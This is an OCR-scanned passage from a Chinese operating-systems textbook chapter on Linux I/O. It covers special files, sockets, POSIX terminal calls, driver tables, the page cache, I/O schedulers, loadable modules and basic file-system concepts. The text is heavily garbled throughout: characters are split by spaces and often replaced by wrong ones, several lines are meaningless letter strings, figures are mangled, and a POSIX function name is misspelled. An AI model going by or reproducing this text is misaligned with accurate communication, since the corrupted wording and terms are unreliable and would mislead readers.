个 块 特殊 文件 ， 并 且 不 用 读 第 0 块 到 第 123 块 瓯 能 够 读 第 124 块 。 磁 盘 束 
征 块 特殊 文件 的 典型 应 用 。 


字符 特殊 文件 通常 用 于 表示 输入 和 输出 字符 流 的 设备 。 键 盘 、 打 
印 机 、 网 络 、 鼠 标 、 绘 图 机 以 及 大 部 分 授 受 用 户 数 据 或 回 用户 输出 数 
据 的 设备 都 使 用 字符 特殊 文件 来 表示 。 访 问 一 个 鼠标 的 124 块 是 不 可 能 
的 (甚至 是 无 意义 的 ) 。 


每 个 特殊 文件 都 和 一 个 处 理 其 对 应 设备 的 设备 驱动 相关 联 。 每 个 
驱动 程序 都 通过 一 个 主 设备 号 来 标识 。 如 果 一 个 驱动 程序 支持 多 个 设 
备 ， 如 ， 相 同类 型 的 两 个 磁盘 ， 每 个 们 c 盘 使 用 一 个 次 设备 号 来 标识 。 
主 设备 号 和 次 设备 号 结合 在 一 起 能 够 惟一 地 确定 每 个 WO 设备 。 在 很 少 
的 情况 下 ， 一 个 单独 的 驱动 程序 处 理 两 种 关系 密切 的 设备 。 比 如 : 

与 “dev/tty” 联 合 的 驱动 程序 同时 控制 着 键盘 和 显示 器 ， 这 两 种 设备 通 
常 被 认为 是 一 种 设备 ， 即 终端 。 


大 部 分 的 字符 特殊 文件 都 不 能 够 被 随机 访问 ， 因 此 它们 通常 需要 
用 不 同 于 块 特殊 文件 的 方式 来 控制 。 比 如 ， 由 键盘 上 键入 输入 字符 并 
显示 在 显示 器 上 “。 当 一 个 用 户 键 入 了 一 个 错误 的 字符 ， 并 且 想 取消 键 
入 的 最 后 一 个 字符 时 ， 他 殴 击 其 他 的 键 。 有 人 喜欢 使 用 “backspace” 回 
退 键 ， 也 有 人 喜欢 “del" 删 除 键 。 类 似 地 ， 为 了 取消 刚 键入 的 一 行 字 
符 ， 也 有 很 多 方法 。 传 统 的 方法 是 输入 “@”， 但 是 随 着 e-mail 的 传播 
(在 电子 邮件 地 址 中 使 用 @) ， 一 些 系 统 使 用 “CTRL+U” 或 者 其 他 字 
符 来 达到 目的 。 同 样 的 ， 为 了 中 断 正在 运行 的 程序 ， 需 要 使 用 一 些 特 
殊 的 键 。 不 同 的 人 有 不 同 的 偏爱 。“CTRL+C” 是 常用 的 方法 ， 但 不 是 
惟一 的 。 


Linux 人 允许 用 户 目 定义 这 些 特殊 的 功能 ， 而 不 是 强迫 每 个 人 使 用 系 
统 选择 的 那 种 。Linux 提 供 了 一 个 专门 的 系统 调用 来 设置 这 些 选项 。 这 
个 系统 调用 也 处 理 tab 扩 展 ， 字 符 输出 有 效 、 失 效 ， 回 车 和 换行 之 间 的 
转换 等 类 似 的 功能 。 这 个 系统 调用 不 能 用 于 普通 文件 和 块 特殊 文件 。 


10.5.2 ”网 络 


IO 的 另外 一 个 例子 是 网 络 ， 由 Berkeley UNIX 首 创 并 在 Linux 中 差 
不 多 原封 不 动 引 入 。 在 Berkeley 的 设计 中 ， 关 键 概念 是 套 接 字 
(socket) 。 套 接 字 与 邮 简 和 墙壁 上 的 电话 插座 是 类 似 的 ， 因 为 套 接 字 
允许 用 户 连 接 到 网 络 ， 正 如 邮 简 允 许 用 户 连 接 到 邮政 系统 ， 墙 壁 上 的 
电话 插座 允许 用 户 插 入 电话 并 且 连 接 到 电话 系统 。 套 接 字 的 位 置 见 图 
10-19。 套 接 字 可 以 被 动态 创建 和 销毁 。 创 建 一 个 套 接 字 成 功 后 ， 系 统 
返回 一 个 文件 描述 符 。 创 建 和 连接、 读数 据 、 写 数据 、 解 除 连接 时 要 用 


到 这 个 文件 摘 述 符 。 


发 送 进程 接收 进程 


内 核 空 间 


be 


网 络 


图 10-19 网 络 中 使 用 套 接 字 


每 个 套 接 字 文 持 一 种 特定 的 网 络 类 型 ， 这 在 套 接 字 创建 时 指定 。 


me fe FA Se E: 
1) 8) SEA TE AERA i o 
2) 可 靠 的 面 癌 连 搂 的 数据 包 流 。 
3) 不 可 徘 的 数据 包 传输 。 


第 一 种 套 接 字 类 型 允许 在 不 同 机 器 上 的 两 个 进程 之 间 建 立 一 个 等 
同 于 管道 的 连接 。 字 节 从 一 个 端点 注入 然后 按 注入 的 顺序 从 另外 一 个 
问 点 流出 。 系 统 保证 所 有 被 传送 的 字 万 都 能 够 到 达 ， 并 且 按 照发 送 时 
的 顺序 到 达 。 


除 保留 了 数据 包 之 间 的 分 界 之 外 ， 第 二 种 类 型 和 第 一 种 是 相同 
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收 2560 字 节 ， 那 么 使 用 第 一 种 类 型 的 套 接 字 ， 接 收 者 接收 一 次 会 立刻 
接收 到 所 有 2560 个 字 闻 。 要 是 使 用 第 二 种 类 型 的 套 接 字 ， 接 收 着 一 次 
只 能 收 到 512 个 字 节 ， 而 要 得 到 剩 下 的 数据 ， 还 需要 再 进行 4 次 调用 。 
用 户 可 以 使 用 第 三 种 类 型 的 克 接 字 来 访问 原始 网 络 。 这 种 类 型 的 套 接 
字 尤 其 适用 于 实时 应 用 和 用 户 想 要 实现 特定 错误 处 理 模 式 的 情况 。 数 
据 包 可 能 会 丢失 或 者 被 网 络 重 排序 。 和 前 两 种 方式 不 同 ， 这 种 方式 没 
有 任何 保证 。 第 三 种 方式 的 优点 是 有 更 高 的 性 能 ， 而 有 时 候 它 比 可 知 
性 更 加 重要 (如 在 传输 多 媒体 时 ， 快 速 比 正确 性 更 有 用 ) 。 


在 创建 套 接 字 时 ， 有 一 个 参数 指定 使 用 的 协议 。 对 于 可 靠 字 节 流 
通信 来 说 ， 使 用 最 广泛 的 协议 是 TCP (传输 控制 协议 ) 。 对 于 不 可 靠 数 
据 包 传输 来 说 ，UDP (用 户 数 据 报 协 议 ) 是 最 常用 的 协议 。 这 两 种 协 
议 都 位 于 IP (互联 网 协议 ) 层 之 上 。 这 些 协 议 都 源 于 美国 国防 部 的 
ARPANET， 现 在 成 为 互联 网 的 基础 。 没 有 可 徘 数 据 包 流 类 型 的 通用 协 
议 。 


在 一 个 套 接 字 能 够 用 于 网 络 通信 之 前 ， 必 须 有 一 个 地 址 与 它 绑 
定 。 这 个 地 址 可 以 是 几 个 命名 域 中 的 一 个 。 最 常用 的 域 为 互联 网 
(Internet) 命名 域 ， 它 在 V4 (第 4 个 版 本 ) 中 使 用 32 位 整数 作为 其 命名 
端点 ， 在 V6 中 使 用 128 位 整数 (V5 是 一 个 实验 系统 ， 从 未 成 为 主 


流 ) 。 


一 旦 套 接 字 在 源 计 算 机 和 目的 计算 机 都 建立 成 功 ， 则 两 个 计算 机 
之 间 可 以 建立 起 一 个 连接 (对 于 面向 连接 的 通信 来 说 ) 。 一 方 在 本 地 
套 接 字 上 使 用 一 个 listen 系 统 调用 ， 它 创建 一 个 缓冲 区 并 且 阻 塞 ， 直 到 
数据 到 来 。 另 一 方 使 用 connect 系 统 调用 ， 并 且 把 本 地 确 接 字 的 文件 描 
述 符 和 远程 套 接 字 的 地 址 作为 参数 传递 进去 。 如 采 远 程 一 方 接受 了 此 
次 调用 ， 则 系统 在 两 个 套 接 字 之 间 建 立 起 一 个 连接 。 


一 旦 连接 建立 成 功 ， 它 的 功能 就 类 似 于 一 个 管道 。 一 个 进程 可 以 
使 用 本 地 套 接 字 的 文件 描述 符 来 从 中 读 写 数据 。 当 此 连接 不 再 需要 
上 时， 可 以 用 常用 的 方式 ， 即 通过 close 系 统 调 用 来 关闭 它 。 


10.5.3 Linux 的 输入 /输出 系统 调用 


Linux 系 统 中 的 每 个 IO 设备 都 有 一 个 特殊 文件 与 其 关联 。 大 部 分 的 
I/O 只 使 用 合适 的 文件 就 可 以 完成 ， 并 不 需要 特殊 的 系统 调用 。 然 而 ， 
有 了 时 需要 一 些 设备 专用 的 处 理 。 在 POSIX 之 前 ， 大 部 分 UNIX 系 统 有 一 
个 叫 作 ioct 的 系统 调用 ， 它 在 特殊 文件 上 执行 大 量 设备 专用 的 操作 。 数 
年 之 间 ， 此 系统 调用 已 经 变 得 非常 混乱 。POSIX 对 其 进行 了 清理 ， 把 
它 的 功能 划分 为 主要 面向 终端 设备 的 独立 的 功能 调用 。 在 Linux 和 现代 
UNIX 系 统 中 ， 每 个 功能 调用 是 独立 的 系统 调用 ， 还 是 它们 共享 一 个 单 
独 的 系统 调用 或 者 其 他 的 方式 ， 都 是 依赖 于 实现 的 。 


在 图 10-20 中 的 前 4 个 系统 调用 用 来 设置 和 获取 终端 速度 。 为 输入 和 
输出 提供 不 同 的 系统 调用 是 因为 一 些 调制 解 调 器 工作 速率 不 同 。 例 
如 ， 旧 的 可 视图 文系 统 允 许 用 户 在 家 通过 短 请 求 以 75 位 /s 的 上 传 速度 访 
问 服务 器 上 的 公共 数据 ， 而 下 载 速度 为 1200 位 /s。 这 个 标准 在 一 段 时 间 
内 被 采用 ， 因 为 对 于 家 庭 应 用 来 说 ， 输 入 输出 时 都 采用 1200 位 / 秒 则 大 
昂贵 了 。 网 络 世 界 中 的 时 代 已 经 改变 了 。 不 对 称 性 仍然 存在 ， 一 些 电 
话 公司 提供 8Mbps 的 入 站 服务 和 512kbps 的 出 站 服务 ， 称 为 ADSL (GEX 
称 数 字 用 户 环 线 ) 。 


s=cfsetospeed (&termios,speed) | 设置 输出 速率 l 
s=cfsetispeed (&termios,speed) 设置 输入 速率 
s=cfgetospeed (&termios,speed ) 获取 输出 速率 
s=cfgtetispeed (&termios,speed ) 获取 输入 速率 
s=tcsetattr (fd,opt,&termios ) 设置 属性 

s=tcgetattr (fd,&termios ) 获取 属性 = 


图 10-20 管理 终端 的 主要 POSIX 系 统 调用 


列表 中 的 最 后 两 个 系统 调用 主要 用 来 设置 和 读 回 所 有 用 来 消除 子 
符 和 行 以 及 中 断 进程 等 功能 的 特殊 字符 。 男 外 ， 它 们 可 以 使 回 显 有 效 
或 无 效 ， 管 理 流 控制 及 其 他 相关 功能 。 还 有 一 些 1/O 功 能 调用 ， 但 是 它 
们 都 是 专用 的 ， 所 以 这 里 就 不 进一步 讨论 了 。 此 外 ，ioct 系 统 调用 依然 
可 用 。 


10.5.4 ”输入 /输出 在 Linux 中 的 实现 


在 Linux 中 WO 是 通过 一 系列 的 设备 驱动 来 实现 的 ， 每 个 设备 类 型 对 
应 一 个 设备 驱动 。 设 备 驱动 的 功能 是 对 系统 的 其 他 部 分 隔离 硬件 的 细 
方 。 通 过 在 驱动 程序 和 操作 系统 其 他 部 分 之 间 提 供 一 层 标 准 的 接口 ， 
使 得 大 部 分 WO 系统 可 以 被 划 归 到 内 核 的 机 右 无 天 部 分 。 


当 用 户 访问 一 个 特殊 文件 时 ， 由 文件 系统 提供 此 特殊 文件 的 主 设 
备 号 和 次 设备 号 ， 并 判断 它 是 一 个 块 特殊 文件 还 是 一 个 字符 特殊 文 
件 。 主 设备 号 用 于 索引 存 有 字符 设备 或 者 块 设 备 数据 结构 的 两 个 内 部 
散 列 表 之 一 。 定 位 到 的 数据 结构 包含 指向 打开 设备 、 读 设备 、 写 设备 
等 功能 的 钞 数 指针 。 次 设备 号 被 当 作 参 数 传递 。 在 Linux 系 统 中 添加 一 
个 新 的 设备 类 型 ， 意 味 着 要 向 这 些 表 添加 一 个 新 的 表 项 ， 并 提供 相应 
的 函数 来 处 理 此 设备 上 的 各 种 操作 。 


图 10-21 展 示 了 一 部 分 可 以 跟 不 同 的 字符 设备 关联 的 操作 。 每 一 行 
指向 一 个 单独 的 WO 设备 ( 即 一 个 单独 的 驱动 程序 ) 。 列 表示 所 有 的 字 
符 驱 动 程序 必须 文 持 的 功能 。 还 有 几 个 其 他 的 功能 。 当 一 个 操作 要 在 
一 个 字符 特殊 文件 上 执行 时 ， 系 统 通 过 检索 字符 设备 的 艇 列表 来 选择 
合适 的 数据 结构 ， 然 后 调用 相应 的 功能 来 执行 此 操作 。 因 此 ， 每 个 文 
件 操 作 都 包含 指 回 相应 驱动 程序 的 一 个 函数 指针 。 


| ”设备 Open Close Read Write loctl 其 他 
Null null null null null null ote 
Ate | null null mem_read mem_write null 
键盘 k_open k close k_read error k_ioctl 
Tty tty_open | tty_close | tty read | tty write | tty_ioctl 
打印 机 Ip_open | Ip_close error Ip_write | lp ioctl | 


图 10-21 典型 字符 设备 支持 的 部 分 文件 操作 


每 个 驱动 程序 都 分 为 两 部 分 。 这 两 部 分 都 是 Linux 内 核 的 一 部 分 ， 
并 且 都 运行 在 内 核 态 。 上 半 部 分 运行 在 调用 者 的 上 下 文 并 且 与 Linux 其 
他 部 分 交互 。 下 半 部 分 运行 在 内 核 上 下 文 并 且 与 设备 进行 交互 。 驱 动 
程序 可 以 调用 内 存 分 配 、 定 时 器 管理 、DMA 控 制 等 内 核 过 程 。 所 有 可 
以 被 调用 的 内 核 功能 都 定义 在 一 个 叫做 驱动 程序 -内 核 接口 (Driver- 
Kernel Interface) 的 文档 中 。 编 写 Linux 设 备 驱 动 的 细节 请 参见 文献 
(Egan 和 Teixeira，1992; Rubini 等 人 ，2005) 


IO 系统 被 划分 为 两 大 部 分 ， 处 理 块 特殊 文件 的 部 分 和 处 理 字符 特 
殊 文件 的 部 分 。 下 面 将 依次 讨论 这 两 部 分 。 


系统 中 处 理 块 特殊 文件 〈 比 如 ， 磁 盘 ) IO 的 部 分 的 目标 是 使 必须 
要 完成 的 传输 次 数 最 小 。 为 了 实现 这 个 目标 ，Linux 系 统 在 磁盘 张 动 程 
序 和 文件 系统 之 间 放 置 了 一 个 高 速 缓存 (cache) ， 如 图 10-22。 在 2.2 版 
本 内 核 之 前 ，Linux 系 统 完整 地 维护 着 两 个 单独 的 缓存 : 页 面 缓存 
(page cache) 和 缓冲 器 缓存 (buffer cache) ， 因 此 ， 存 储 在 一 个 人 磁极 


块 中 的 文件 可 能 会 被 缓存 在 两 个 缓存 中 。2.2 和 版 本 以 后 的 Linux 内 核 版 本 
只 有 一 个 统一 的 缓存 。 一 个 通用 数据 块 层 (generic block layer) 把 这 些 
组 件 整合 在 了 一 起 ， 执 行 磁 强 春 区、 数据 块 、 缓 冲 区 和 数据 页 面 之 间 
必要 的 转换 ， 并 且 激 活 作 用 于 这 些 结构 上 的 操作 。 


虚拟 文件 系统 


文件 系统 1 
I OE EE a a | 

网 络 套 | ! | 
RF |i | 


rm mm — —— << 


-e e e ee el 


可 选 的 
行规 则 


网 络 设 


fr UK) 


图 10-22 Linux W/O 系 统 中 一 个 文件 系统 的 细节 


cache 是 内 核 里 面 用 来 保存 数 以 生计 的 最 近 使 用 的 数据 块 的 表 。 不 
管 本 着 什么 样 的 目的 (i 节点 ， 目 录 或 数据 而 需要 一 个 磁盘 块 ， 系 统 


首先 检查 这 个 块 是 否 在 cache 里 面 。 如 果 在 cache 中 ， 就 可 以 从 cache 里 直 
接 得 到 这 个 块 ， 从 而 避免 了 一 次 磁盘 访问 ， 这 可 以 在 很 大 程度 上 提高 
系统 性 能 。 


如 琳 页 面 cache 中 没有 这 个 块 ， 系 统 束 会 从 磁盘 中 把 这 个 块 读 入 到 
cache 中 ， 然 后 再 从 cache 中 复制 到 请 求 它 的 地 方 。 由 于 页 面 cache 的 大 小 
征 固 定 的 ， 因 此 ， 前 面 章 节 介 绍 的 页 面 置换 算法 在 这 里 也 是 需要 的 。 


页 面 cache 也 文 持 写 数据 块 ， 就 像 读 数据 一 样 。 一 个 程序 要 回 写 一 
MAW, ERS Bicache#, MVERRS FM Le 4 cachet KFE 
过 一 个 指定 值 时 ，pdflush 守 护 进程 会 把 这 个 块 写 回 到 磁盘 上 “。 另 外 ， 
为 了 防止 数据 块 被 写 回 到 磁盘 之 前 在 cache 里 存留 太 长 时 间 ， 每 隔 30 秘 
系统 会 把 所 有 的 “ 脏 块 ? 午 写 回 到 磁盘 上 。 


Linux 依 靠 一 个 IO 调度 器 来 保证 磁头 反复 移动 的 延迟 最 小 。IO 调 
度 器 的 作用 是 对 块 设备 的 读 写 请 求 重新 排序 或 对 这 些 读 写 请 求 进行 合 
并 。 有 很 多 调度 器 变种 ， 它 们 是 根据 不 同类 型 的 工作 负载 进行 优化 的 
结果 。 基 本 的 Linux IO 调度 器 基于 最 初 的 Linus 电 梯 调 度 器 (Linus 
Elevator scheduler) 。 电 梯 调 度 器 的 操作 可 以 这 样 总 结 : 按 磁 副 请 求 的 
扇 区 地 址 的 顺序 将 磁 副 操作 在 一 个 双向 链表 中 排序 。 新 的 请 求 以 排序 
的 方式 插入 到 双向 链表 中 。 这 种 方法 可 以 有 效 地 防止 磁头 重复 移动 。 
请 求 列表 经 过 合并 后 ， 相 邻 的 操作 会 被 整合 为 一 条 单独 的 磁盘 请 求 。 
基本 电梯 调度 器 有 一 个 问题 是 会 导致 饥饿 的 情况 发 生 。 因 此 ，Linux 磁 


盘 调 度 器 的 修改 版 本 包括 两 个 附加 的 列表 ， 维 护 按时 限 (deadline) HE 
序 的 读 写 操作 。 读 请 求 的 缺 省 时 限 是 0.5s， 写 请 求 的 缺 省 时 限 是 5s。 如 
果 最 早 的 写 操作 的 系统 定义 的 时 限 要 过 期 了 ， 那 么 相对 于 任何 在 主 双 
器 链 表 中 的 请 求 来 说 ， 这 个 写 请 求 会 被 优先 服务 。 
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文件 (raw block file) 。 这 些 文件 允许 程序 通过 绝对 块 号 来 访问 磁盘 ， 
而 不 考虑 文件 系统 。 它 们 通常 被 用 于 分 页 和 系统 维护 。 


与 字符 设备 的 交互 是 很 人 镜 单 的 。 因 为 子 符 设 备 产 生 和 接收 的 是 子 

符 流 或 字 市 数据 ， 所 以 让 字符 设备 文 持 随机 访问 是 几乎 没有 意义 的 。 

不 过 行规 则 (line disciplines) 的 使 用 是 个 例外 。 一 个 行规 则 可 以 和 一 
个 终端 设备 联合 在 一 起 ， 通 过 tty_struct 结 构 来 表示 ， 一 般 作为 和 终端 交 
换 的 数据 的 解释 器 。 例 如 ， 利 用 行规 则 可 以 完成 本 地 行 编辑 (BIER 

的 字符 和 行 可 以 被 删除 ) ， 回 车 可 以 映射 为 换行 ， 以 及 其 他 的 特殊 处 

理 能 够 被 完成 然而， 如 采 一 个 进程 要 跟 每 个 字符 交互， 那么 它 可 以 

把 行 设置 为 原始 模式 ， 此 时 行规 则 将 被 忽略 。 男 外 ， 并 不 是 所 有 的 设 

备 都 有 行规 则 。 


输出 采用 与 输入 类 似 的 工作 方式 ， 如 把 tab 扩 展 为 空格 ， 把 换行 转 
变 为 回 车 + 换行 ， 在 慢 的 机 械 式 终端 的 回 车 后 面 加 填充 字符 等 。 像 输入 
一 样 ， 输 出 可 以 通过 (加 工 模式 ) 行规 则 ， 或 者 忽略 (原始 模式 ) 行 
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的 计算 机 的 情况 尤其 有 用 ， 因 为 这 些 情况 都 不 需要 进行 转换 。 


10.5.5 Linux 中 的 模块 


几 十 年 来 ，UNIX 设 备 驱 动 程序 是 被 静态 链接 到 内 核 中 的 。 因 此 ， 
只 要 系统 局 动 ， 设 备 驱 动 程序 都 会 被 加 载 到 内 存 中 。 在 UNIX 比 较 成 熟 
的 环境 中 ， 如 大 部 分 的 部 门 小 型 计算 机 以 及 高 端的 工作 站 ， 其 共同 的 
特点 是 IO 设备 集 都 较 小 并 且 稳 定 不 变 ， 这 种 模式 工作 得 很 好 。 基 本 
E, 一 个 计算 机 中 心 会 构造 一 个 包含 1/O 设 备 驱 动 程序 的 内 核 ， 并 且 一 
直 使 用 它 。 如 有 果 第 二 年 ， 这 个 中 心 买 了 一 个 新 的 磁 弄 ， 那 么 重新 链接 
内 核 吏 可 以 了 。 一 点 问题 也 没有 。 


随 着 个 人 电脑 平台 Linux 系 统 的 到 来 ， 所 有 这 些 痢 改变 了 。 相 对 于 
任何 一 人 台 小 型 机 上 的 MO 设备 ，PC 机 上 可 用 IO 设备 的 数量 都 有 了 数量 
级 上 的 增长 。 另 外 ， 虽 然 所 有 的 Linux 用 户 都 有 (或 者 很 容易 得 到 ) 
Linux 源 代码 ， 但 是 绝 大 部 分 用 户 都 没有 能 力 去 添加 一 个 新 的 弛 动 程 
序 、 更 新 所 有 的 设备 驱动 程序 数据 结构 、 重 链接 内 核 ， 然 后 把 它 作 为 
可 局 动 的 系统 进行 安装 (更 不 用 提要 处 理 构造 完成 后 内 核 不 能 局 动 的 


问题 ) o 


Linux 为 了 解决 这 个 问题 ， 引 入 了 可 加 载 模块 (loadable module) 
的 概念 。 可 加 载 模块 是 在 系统 运行 时 可 以 加 载 到 内 核 的 代码 块 。 大 部 


分 情况 下 ， 这 些 模 块 是 字符 或 者 块 设备 张 动 ， 但 是 它们 也 可 以 征 完 整 
的 文件 系统 、 网 络 协 议 、 性 能 监控 工具 或 者 其 他 想 要 添加 的 模块 。 


当 一 个 模块 被 加 载 到 内 核 时 ， 会 发 生 下 面 几 件 事 。 第 一 ， 在 加 载 
过 程 中 ， 模 块 会 个 动态 地 重新 部 闭 。 第 二 ， 系 统 会 检查 这 个 驱动 程序 
需要 的 资源 是 否 可 用 (例如 ， 中 断 请 求 级 别 ) 。 如 果 有 效 ， 则 把 这 些 
资源 标记 为 正在 使 用 。 第 三 ， 设 置 所 有 和 需要 的 中 断 向 量 。 第 四 ， 更 新 
驱动 转换 表 使 其 能 够 处 理 新 的 主 设备 类 型 。 最 后 ， 运 行 驱动 程序 来 完 
成 可 能 需要 的 特定 设备 的 初始 化 工作 。 一 旦 上 述 所 有 的 步骤 都 完成 
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了 。 其 他 现代 的 UNIX 系 统 也 文 持 可 加 载 模块 。 


10.6 Linux 文件 系统 


在 包括 Linux 在 内 的 所 有 操作 系统 中 ， 最 可 见 的 部 分 是 文件 系统 。 
在 本 市 的 以 下 部 分 ， 我们 将 介绍 隐藏 在 Linux 文 件 系 统 、 系 统 调用 以 及 
文件 系统 实现 背后 的 基本 思想 。 这 些 思想 中 有 一 些 来 源 于 MULTICS， 
虽然 有 很 多 已 经 被 MS-DOS、Windows 和 其 他 操作 系统 使 用 过 了 ， 但 是 
其 他 的 都 是 UNIX 类 操作 系统 特有 的 。Linux 的 设计 非常 有 意思 ， 因 为 
它 忠 实地 秉承 了 “小 的 就 是 美好 的 ”(Small is Beautiful) 的 设计 原则 。 
虽然 只 是 使 用 了 最 简 的 机 制 和 少量 的 系统 调用 ， 但 是 Linux 却 提供 了 强 
大 的 和 优美 的 文件 系统 。 


10.6.1 基本 概念 


最 初 的 Linux 文 件 系统 是 MINIX 1 文件 系统 。 但 由 于 它 只 能 支持 14 
字 节 的 文件 名 (为 了 和 UNIX Version 7 兼容 ) 和 最 大 64MB 的 文件 (这 
在 只 有 10MB 和 硬盘 的 年 代 是 足够 强大 的 ) ， 在 Linux 刚 被 开发 出 来 的 时 
候 ， 开 发 者 就 意识 到 需要 开发 更 好 的 文件 系统 (开始 于 MINIX 1 发 布 的 
5 年 后 ) 。 对 MINIX 1 文件 系统 进行 第 一 次 改进 后 的 文件 系统 是 ext 文 件 
系统 。ext 文 件 系 统 能 文 持 255 个 字符 的 文件 名 和 2GB 的 文件 大 小 ， 但 是 
它 的 速度 比 MINIX 1 慢 ， 所 以 仍然 有 必要 对 它 进行 改进 。 最 终 ，ext2 文 
件 系统 被 开发 出 来 ， 它 能 够 支持 长 文件 名 和 大 文件 ， 并 且 具 有 更 好 的 


性 能 ， 这 使 得 它 成 为 了 Linux 主 要 的 文件 系统 。 不 过 ，Linux 使 用 虚拟 文 
件 系统 (VES) 层 支 持 很 多 类 型 的 文件 系统 (VFS 将 在 下 文 介绍 ) 。 在 
Linux 链 接 时 ， 用 户 可 以 选择 要 构造 到 内 核 中 的 文件 系统 。 如 果 和 需要 其 
他 文件 系统 ， 可 以 在 运行 时 作为 模块 动态 加 载 。 


Linux 中 的 文件 是 一 个 长 度 为 0 或 多 个 字 市 的 序列 ， 可 以 包含 任意 
的 信息 。ASCII 文 件 、 二 进 制 文件 和 其 他 类 型 的 文件 是 不 加 区 别 的 。 文 
件 中 各 个 位 的 人 台 义 完全 由 文件 所 有 者 确定 ， 而 文件 系统 不 会 天 心 。 文 
件 名 长 度 限 制 在 255 个 字符 内 ， 可 以 由 除了 NUL 以 外 的 所 有 ASCII 字 符 
构成 ， 也 就 是 说 ， 一 个 包含 了 三 个 回 车 符 的 文件 名 也 是 合法 的 (但 是 
这 样 命名 很 不 方便 ) 。 


按照 惯例 ， 许 多 程序 能 识别 的 文件 包含 一 个 基本 文件 名 和 一 个 扩 
展 名 ， 中 间 用 一 个 点 连接 (点 也 被 认为 是 占用 了 文件 名 的 一 个 字 
RF) 。 例 如 一 个 名 为 prog.c 的 文件 是 一 个 典型 的 C 源 文件 ，prog.f90 是 一 
个 典型 的 FORTRAN 90 程 序 文件 ， 而 prog.o 通 常 是 一 个 object 文 件 (编译 
器 的 输出 文件 ) 。 这 个 惯例 不 是 操作 系统 要 求 的 ， 但 是 一 些 编译 器 和 
程序 希望 是 这 样 ， 比 如 一 个 名 为 prog.java.gz 的 文件 可 能 是 一 个 gzip 压 缩 
的 Java 程 序 。 


为 了 方便 ， 文件 可 以 被 组 织 在 一 个 目 如 里。 目录 存储 成 文件 的 形 
式 并 且 在 很 大 程度 上 可 以 作为 文件 处 理 。 目 录 可 以 包含 子 目 隶 ， 这 样 
可 以 形成 有 层次 的 文件 系统 。 根 目录 表示 为 “”， 它 通 前 包含 了 多 个 子 


目录 。 字 符 “/* 还 用 于 分 离 目 录 名 ， 所 以 /usr/ast/x 实 际 上 是 说 文件 x 位 于 
目录 ast 中 ， 而 目录 ast 位 于 /usr 目 录 中 。 图 10-23 列 举 了 根 目 录 下 几 个 主 
要 的 目录 及 其 内 容 。 


Al 10-23 大 部 分 Linux 系 统 中 一 些 重要 的 目录 


在 Linux 中 ， 不 管 是 对 shell 还 是 一 个 打开 文件 的 程序 来 说 ， 都 有 两 
种 方法 表示 一 个 文件 的 文件 名 。 第 一 种 方法 是 使 用 绝对 路 径 ， 绝 对 路 
径 告诉 系统 如 何 从 根 目 孙 开 始 查找 一 个 文件 。 例 
如 /usr/ast/books/mos3/chap-10， 这 个 路 径 名 告诉 系统 在 根 目录 里 寻找 
个 叫 usr 的 目录 ， 然 后 再 从 usr 中 寻找 ast 目 录 .……. 依 照 这 种 方式 ， 最 终 找 
到 chap-10 文 件 。 


绝对 路 径 的 缺点 是 文件 名 太 长 并 且 不 方便 。 因 为 这 个 原因 ，Linux 
允许 用 户 和 进程 把 他 们 当前 工作 的 目 孙 标识 为 工作 目 孙 ， 这 样 路 径 名 


就 可 以 相对 于 工作 目 孙 命名 ， 这 种 方式 命名 的 目录 名 叫做 相对 路 径 。 
例如 ， 如 果 /musvastbooks/mos3 是 工作 目录 ， 那 么 Shell 命 令 


cp chap-10 backup-10 


和 长 命令 cp/usr/ast/books/mos3/chap-10/usr/ast/books/mos3/backup- 
10 的 效果 是 一 样 的 。 


一 个 用 户 要 使 用 属于 另 一 个 用 户 的 文件 或 者 使 用 文件 树 结构 里 的 
某 个 文件 的 情况 是 经 常 发生 的 。 例 如 ， 两 个 用 户 共享 一 个 文件 ， 这 个 
文件 位 于 其 中 某 个 用 户 所 拥有 的 目录 中 ， 另 一 个 用 户 需 要 使 用 这 个 文 
件 时 ， 必 须 通过 绝对 路 径 才 能 引用 它 (或 者 通过 改变 工作 目录 的 方 
A) 。 如 果 绝 对 路 径 名 很 长 ， 那 么 每 次 输入 时 将 会 很 麻烦 。 为 了 解决 
这 个 问题 ，Linux 提 供 了 一 种 指向 已 存在 文件 的 目录 项 ， 称 作 链 接 
(link) 。 


以 图 10-24a 为 例 ， 两 个 用 户 Fred 和 Lisa 一 起 工作 来 完成 一 个 项 目 ， 
他 们 需要 访问 对 方 的 文件 。 如 果 Fred 的 工作 目录 是 /usr/fred， 他 可 以 使 
用 /sr/lisa/x 来 访问 Lisa 目 录 下 的 文件 x。Fred 也 可 以 如 图 10-24b 所 示 的 方 
法 ， 在 自己 目录 下 创建 一 个 链接 ， 然 后 他 就 可 以 用 x 来 代替 /usr/lisa/x 
了 o 


fred lisa 


a X X 

b y y 

C Z Z 
a) b) 


图 10-24 a) 链 接 前 ; b) 链 接 后 


在 上 面 的 例子 中 ， 我 们 说 在 创建 链接 之 前 ，Fred 引 用 Lisa 的 文件 x 
的 惟一 方法 是 使 用 绝对 路 径 。 实 际 上 这 并 不 正确 ， 当 一 个 目 孙 被 创建 
出 来 时 ， 有 两 个 目 邓 项 “.” 和 “..” 被 目 动 创建 出 来 存放 在 该 目录 中 ， 前 才 
代表 工作 目 孙 目 身 ， 而 后 着 表示 该 目 孙 的 父 目 孙 ， 也 束 是 该 目 孙 所 在 
的 目录 。 这 样 一 来 ， 在 /usr/fred 目 录 中 访问 Lisa 的 文件 x 的 男 一 个 路 径 


Zz: ../lisa/x ° 


除了 普通 的 文件 之 外 ，Linux 还 文 持 字 符 特殊 文件 和 块 特殊 文件 。 
字符 特殊 文件 用 来 建 模 串 行 WO 设 备 ， 比 如 键盘 和 打印 机 。 如 果 打 开 并 
从 /dec/tty 中 读 取 内 容 ， 等 于 从 键盘 读 取 内 容 ， 而 如 果 打 开 并 癌 /dev/lp 中 
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文件 名 ， 它 用 来 直接 向 硬盘 分 区 中 读 取 和 写 入 内 容 ， 而 不 需要 考虑 文 

件 系统 。 一 个 偶 移 为 k 字 下 的 read 操 作 ， 将 会 从 相应 分 区 开始 的 第 k 个 字 
市 开始 读 取 ， 而 完全 忽略 i 节点 和 文件 的 结构 。 原 始 块 设备 常 补 一 些 建 
WZ (如 mkfs) 或 修补 (如 fsck) 文件 系统 的 程序 用 来 进行 分 页 和 交换 。 


许多 计算 机 有 两 块 或 更 多 的 磁盘 。 银 行使 用 的 大 型 机 ， 为 了 存储 
大 量 的 数据 ， 通 常 需 要 在 一 台 机 器 上 安装 100 个 或 更 多 的 磁盘 。 甚 至 在 
PC 上 也 至 少 有 两 块 磁盘 一 一 一 块 硬盘 和 一 个 光盘 驱动 器 (如 DVD) ° 
